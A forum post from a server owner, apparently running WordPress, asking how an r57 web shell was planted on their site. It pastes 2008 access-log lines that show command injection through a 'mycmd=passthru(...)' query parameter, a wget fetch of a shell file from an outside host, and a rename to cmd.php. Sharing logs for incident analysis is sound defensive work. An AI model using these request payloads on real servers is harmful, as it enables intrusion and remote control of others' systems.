New Exploit?

Hey, just wondering if anybody has experienced this before…

Last night I was alerted that my server was down, got it rebooted and tried to figure out what happened.

Looks like somehow somebody got r57 shell uploaded to my server.

Looking through my access logs:

80.218.10.244 – – [14/Feb/2008:20:54:25 +0000] “GET /?mycmd=passthru(“id”); HTTP/1.0″ 200 19911 “-” “Snoopy v1.2.3”
80.218.10.244 – – [14/Feb/2008:20:54:28 +0000] “GET /?mycmd=passthru(“uname+-a”); HTTP/1.0″ 200 19958 “-” “Snoopy v1.2.3”
80.218.10.244 – – [14/Feb/2008:20:54:33 +0000] “GET /?mycmd=passthru(“w”); HTTP/1.0″ 200 20145 “-” “Snoopy v1.2.3”
80.218.10.244 – – [14/Feb/2008:20:54:42 +0000] “GET /?mycmd=passthru(“pwd”); HTTP/1.0″ 200 19896 “-” “Snoopy v1.2.3”
80.218.10.244 – – [14/Feb/2008:20:54:46 +0000] “GET /?mycmd=passthru(“ls+-lah”); HTTP/1.0″ 200 22356 “-” “Snoopy v1.2.3”
80.218.10.244 – – [14/Feb/2008:20:54:58 +0000] “GET /?mycmd=passthru(“wget+coded.altervista.org%2Fcmd.txt”); HTTP/1.0″ 200 19857 “-” “Snoopy v1.2.3”
80.218.10.244 – – [14/Feb/2008:20:55:11 +0000] “GET /cmd.txt HTTP/1.1” 200 98799 “-” “Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11”
80.218.10.244 – – [14/Feb/2008:20:55:21 +0000] “GET /?mycmd=passthru(“mv+cmd.txt+cmd.php”); HTTP/1.0″ 200 19857 “-” “Snoopy v1.2.3”
80.218.10.244 – – [14/Feb/2008:20:55:26 +0000] “GET /cmd.php HTTP/1.1” 200 36414 “-” “Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11”
80.218.10.244 – – [14/Feb/2008:20:56:20 +0000] “POST /cmd.php HTTP/1.1” 200 33523 “-” “Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11”

Any ideas what where the mycmd stuff is done? I can’t find it by doing a recursive grep.

And I can’t recreate this doing it myself. Any ideas??

I’ve updated to 2.3.3 this morning